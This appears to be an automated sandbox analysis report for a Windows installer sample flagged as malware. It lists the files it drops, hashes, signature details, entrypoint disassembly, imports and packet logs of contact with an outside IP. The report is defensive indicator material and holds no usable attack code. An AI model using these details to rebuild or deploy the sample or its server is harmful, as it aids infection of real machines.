                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Obeyeo.Bib

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):178824
                                                  Entropy (8bit):6.515135274289935
                                                  Encrypted:false
                                                  SSDEEP:1536:Aqnh3ZWvlivpBh2LolEVEF+F2MVQ454gp3cHE6xBiP29vpAX5D57DwVaDXW:RkYzh2Lol/FdUJNfPgk5DVDUd
                                                  MD5:52F571D999E9DD5B6ABFFE0CC9BF8DF3
                                                  SHA1:67743CD31368EA4C7C350C5071A6B1D8A5AF400B
                                                  SHA-256:7CC58916DBEADFF389E9375FD1F8973DB606156E953F309C55C40384E54765E3
                                                  SHA-512:0BA04B8CDA196099229824B65348B71483D50377D10660AF8CD70A10919A310D88DDBA80D1F595524F71764BB2A765C87B9E5E2276391B11A272A52E3BBA7C11
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:...6.{..N..p2...H.=L.]......l..b.0..2).v..X..~..q..nm.9..$h....YZ..}..V.u..E.a(M..........q......@9.n.`7......z.N...<...&..h..\.....&.h@p.....%.~5._b..b........B(....:.4......t.S0..J..0.h.&..H.t.gV.&..y.,J.3...m..\.......~n..L.AnI.....C.a.7w^!9.D.]J.....p...C8..Hn.....14.|.. ...k........_9......@%......S..d.>.*I.9.@.....l.....,.4G.l.}..e....<......]...wj.Z.^...j.Fv.#..9n.c{.`..4U...,Q...v.g.t)..o...g......E.}..9...1....Wbl..JT%8..m[x.a.u.7.i)......1+..$l@...x$.~......6q.BE.x..7...n.n..gOZ.V.7..6.a!.c....`.vGm).."L#~..E......tV.....DjX.....Z.>..Z.).c...............D7}d.v.. ..%...v.fH.....Cw..x.^......b\ct....Y.*.g.b...1*cR..%6F'.......Q-.......GH....L!?1...<.^Rf.G.H[O.<.Ke.....R..._e..1..s........y.~..x!...Tl.... .a .;..KG.]%:."%.O..X.S..b..t.o{.......#..9...b..J.e..w...<~b........5................XC....Z....E.zE.g.k.X.^.=.W)...>.'K.h<.C\././.7.d......~./.a~.Yc.......4...{....d..m."...v........v"......iY....9..ka.....M...m.}).....Y..f..-..4..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\Urokkeligheden.Ord114

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):119298
                                                  Entropy (8bit):7.998253263209972
                                                  Encrypted:true
                                                  SSDEEP:1536:6JcdhM4/003cKP7zr9UE0q19q9MUxJ0O1mwVrLSft3KeDQMjE4le/l1NUYeECfZm:LdhM4/Fpb/1Ca2LEt9DQMA4lGVUh14B
                                                  MD5:251C92F85825E5BBBE4D7624FC7F4AE4
                                                  SHA1:BF396458B8D37DCC5880B29A7482A4896828C35F
                                                  SHA-256:20694D441EEAB696B6D6AE5B7785BB0CAD19E1708EF49C28737CAD1805B49CDC
                                                  SHA-512:5730DF53CE6DE9791F81287EA340ECDECEF1B99B80DC7501F9739083AF5D66543795E82C19388522580A43B8553FEAA2D5C0B419502BC7325E34F1862BBD44DD
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:...Ct.m.j\i...G..@k......D.....W.S.CE.P'.O....9l....4Y%\.R...%..'.D.o.%9h........vP.h0...E_..1.}................{...).h....F.r..lm....D..{..dF4.@F..=.....G..&....... v47.L..V..%.$x..rK..ue=.w.)..+b...$.m.Gj..@x.3...14J...#"....G| v8@Y2.R..v.."j...~.,..<..}...&H9F..v..=....>;......HF..c...~..'c.f.p0"...>Q|./."...n..t.............$^.Z.c....h(.df.B..`,..#.?s.8..k'.B.t.....<3..s..h-).Q..\R.O.C=.c.<S..b(..Q#.....r...j..z...U.vU.>..C...@...G-..7=.....".mu52.[...`Bf}0q.V.lF.|(.pMo...^L.l.@.#[bH...1..I.l.Mi..iB..(N"$e.....r..9....1z.2..P.G*H..p....sE..O.cR.l.Z.H/.u_.Z+"Rk.M.g..q....Z..{0...*g....,:....t..QF2.oA.v{....h.....TIN...r.. O.u..P...(........G.....+kk%9W.b.I.Q.....Gy9^~./..Q8..!o]$.5.....4. };......80....ze.^l....WL.b....!..0.N.{Q...'.....I..dnP....7.p..aB.w.Z.v]R.../r.C6(q.C...%...n....2@..0$.X.;CW.1...5...s#.]..x[h..T./.>.(...dJ...q?._.I....K...1'....9.).n1#..5:&.S3^........Z.Z.0.c._.'.....r;bw.P.....K.^.....(....'..4.?....N....#.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):131991
                                                  Entropy (8bit):5.8780987492725405
                                                  Encrypted:false
                                                  SSDEEP:1536:v6J1cdTEl2OzvUtevCuoCW9fPr+vo9F5J7YWv3vbRnBycYWOGWSeaGymtYWOGWSS:VdW2OLgNCwXKSH8WPvVBjA+KE8S5
                                                  MD5:10D998CF80B4437C2979B25EBCBE16D1
                                                  SHA1:79C99DD2ABB99253E41C5E40DAB29522F93345BB
                                                  SHA-256:A0A87BC30F4B39D7B642841A10208CE5286C6CA712B28B9D921E1EA6F547AEE6
                                                  SHA-512:44863645B48815C3C248111F86440E3A0C515AF61B5A17D15B5A6C7304277F76056BCEB6C579E7824E11ADCA4DB3E385FA8019D602C40FA527E725C09B6AA523
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"...%............P........................................@......g}....`... .................................................lE...........................0.............................. i..(....................................................text...X...........................`..`.data........ ......................@....rdata...A...0...B..................@..@.pdata...............R..............@..@.xdata..X............`..............@..@.bss....p................................edata...............n..............@..@.idata..lE.......F...p..............@....CRT....X...........................@....tls......... ......................@....reloc.......0......................@..B........................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                  Entropy (8bit):7.505402259729816
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe
                                                  File size:477800
                                                  MD5:7081c4822cf1c7572dd82822b8f27c49
                                                  SHA1:4ee3b6c423b1c9ebf5befbc73d1eef0c576cf026
                                                  SHA256:b5330f82f3c5c3f223ae9decd3ebdcd74d1a13d95b1c42bd7b2de4e6c6cb0083
                                                  SHA512:6e3377e6a47518f2267cd38646e2cec576d41fd8a67c8c2590f43bf353c0b1f322fc229e70bc98e9c7dfaa1a11cf872a0c8e2c15a31ee90ef1c4e65eac98ee3a
                                                  SSDEEP:12288:Lz772qgvq2nLm4W2RPLKb+nFzIQ3Ja8TA:gXnS4W2RPLKm/of
                                                  TLSH:4DA4D096F74155D6CC24177259BB9D3702B3BD7E14B10B5F61AE32322F332828A07A2E
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@

                                                  File Icon

                                                  Icon Hash:b8eee6a4c0c8c6c2

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x40344a
                                                  Entrypoint Section:.text
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:4ea4df5d94204fc550be1874e1b77ea7

                                                  Authenticode Signature

                                                  Signature Valid:false
                                                  Signature Issuer:CN=Warrambool, OU="Gennembryde Catbrier ", E=Lrerforsamlingen@Resoneres187.ti, O=Warrambool, L=Betpouy, S=Occitanie, C=FR
                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                  Error Number:-2146762487
                                                  Not Before, Not After
                                                  • 16/05/2022 14:16:58 15/05/2025 14:16:58
                                                  Subject Chain
                                                  • CN=Warrambool, OU="Gennembryde Catbrier ", E=Lrerforsamlingen@Resoneres187.ti, O=Warrambool, L=Betpouy, S=Occitanie, C=FR
                                                  Version:3
                                                  Thumbprint MD5:50955086B951A7063EA053252647D196
                                                  Thumbprint SHA-1:B2C1191B987021E62094F55BD9D8BCF9138BF3A6
                                                  Thumbprint SHA-256:26FCB244ABFE2816CFB307605DB0353DBE6BE089ACEC8D49A63FDE728C428741
                                                  Serial:D479F570518060D0

                                                  Entrypoint Preview

                                                  Instruction
                                                  sub esp, 000002D4h
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  push 00000020h
                                                  pop edi
                                                  xor ebx, ebx
                                                  push 00008001h
                                                  mov dword ptr [esp+14h], ebx
                                                  mov dword ptr [esp+10h], 0040A230h
                                                  mov dword ptr [esp+1Ch], ebx
                                                  call dword ptr [004080B4h]
                                                  call dword ptr [004080B0h]
                                                  cmp ax, 00000006h
                                                  je 00007EFC28FA74F3h
                                                  push ebx
                                                  call 00007EFC28FAA64Ch
                                                  cmp eax, ebx
                                                  je 00007EFC28FA74E9h
                                                  push 00000C00h
                                                  call eax
                                                  mov esi, 004082B8h
                                                  push esi
                                                  call 00007EFC28FAA5C6h
                                                  push esi
                                                  call dword ptr [0040815Ch]
                                                  lea esi, dword ptr [esi+eax+01h]
                                                  cmp byte ptr [esi], 00000000h
                                                  jne 00007EFC28FA74CCh
                                                  push ebp
                                                  push 00000009h
                                                  call 00007EFC28FAA61Eh
                                                  push 00000007h
                                                  call 00007EFC28FAA617h
                                                  mov dword ptr [0042A244h], eax
                                                  call dword ptr [0040803Ch]
                                                  push ebx
                                                  call dword ptr [004082A4h]
                                                  mov dword ptr [0042A2F8h], eax
                                                  push ebx
                                                  lea eax, dword ptr [esp+34h]
                                                  push 000002B4h
                                                  push eax
                                                  push ebx
                                                  push 004216E8h
                                                  call dword ptr [00408188h]
                                                  push 0040A384h
                                                  push 00429240h
                                                  call 00007EFC28FAA200h
                                                  call dword ptr [004080ACh]
                                                  mov ebp, 00435000h
                                                  push eax
                                                  push ebp
                                                  call 00007EFC28FAA1EEh
                                                  push ebx
                                                  call dword ptr [00408174h]
                                                  add word ptr [eax], 0000h

                                                  Rich Headers

                                                  Programming Language:
                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x28868.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x735100x1558.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x61f10x6200False0.6656967474489796data6.477074763411717IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x80000x13a40x1400False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xa0000x203380x600False0.501953125data3.9745558434885093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .ndata0x2b0000x430000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x6e0000x288680x28a00False0.4693269230769231data6.072692072533226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_BITMAP0x6e3b80x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                                                  RT_ICON0x6e7200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States
                                                  RT_ICON0x7ef480x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States
                                                  RT_ICON0x883f00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States
                                                  RT_ICON0x8d8780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States
                                                  RT_ICON0x91aa00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States
                                                  RT_ICON0x940480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States
                                                  RT_ICON0x950f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States
                                                  RT_ICON0x95a780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States
                                                  RT_DIALOG0x95ee00x144dataEnglishUnited States
                                                  RT_DIALOG0x960280x13cdataEnglishUnited States
                                                  RT_DIALOG0x961680x100dataEnglishUnited States
                                                  RT_DIALOG0x962680x11cdataEnglishUnited States
                                                  RT_DIALOG0x963880xc4dataEnglishUnited States
                                                  RT_DIALOG0x964500x60dataEnglishUnited States
                                                  RT_GROUP_ICON0x964b00x76dataEnglishUnited States
                                                  RT_MANIFEST0x965280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                  Imports

                                                  DLLImport
                                                  KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                  USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                  ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2022 11:46:42.054048061 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.148497105 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.148823977 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.149955034 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.244431973 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.244541883 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.244872093 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.255182981 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.255256891 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.255314112 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.255362988 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.255367041 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.255418062 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.255425930 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.255481958 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.255536079 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.255542994 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.255589962 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.255616903 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.255645990 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.255649090 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.255695105 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.255743980 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.255793095 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.339199066 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.339277983 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.339426041 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.339488029 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.349769115 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.349843979 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.349900961 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.349956036 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.349958897 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350009918 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350013018 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350013018 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350064039 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350119114 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350157022 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350172997 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350208044 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350208044 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350229979 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350285053 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350305080 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350338936 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350353956 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350393057 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350402117 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350447893 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350451946 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350452900 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350501060 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350548983 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350555897 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350600958 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350610971 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350646973 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350665092 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350704908 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350718975 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.350814104 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.350902081 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.433693886 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.433739901 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.433778048 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.433815002 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.433886051 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.433886051 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.433940887 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.433980942 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.444833040 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.444906950 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.444966078 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445008039 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445024014 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445081949 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445097923 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445097923 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445138931 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445197105 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445197105 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445254087 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445303917 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445311069 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445355892 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445368052 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445405006 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445425034 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445473909 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445473909 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445480108 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445537090 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445584059 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445584059 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445594072 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445652008 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445700884 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445700884 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445708990 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445765972 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445796967 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445822954 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445844889 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445882082 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445898056 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.445938110 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.445995092 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446043015 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446043015 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446050882 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446109056 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446165085 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446188927 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446221113 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446249962 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446276903 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446311951 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446333885 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446383953 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446384907 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446389914 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446446896 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446482897 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446504116 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446536064 CET4984480192.168.11.2066.147.238.212
                                                  Nov 29, 2022 11:46:42.446561098 CET804984466.147.238.212192.168.11.20
                                                  Nov 29, 2022 11:46:42.446618080 CET804984466.147.238.212192.168.11.20
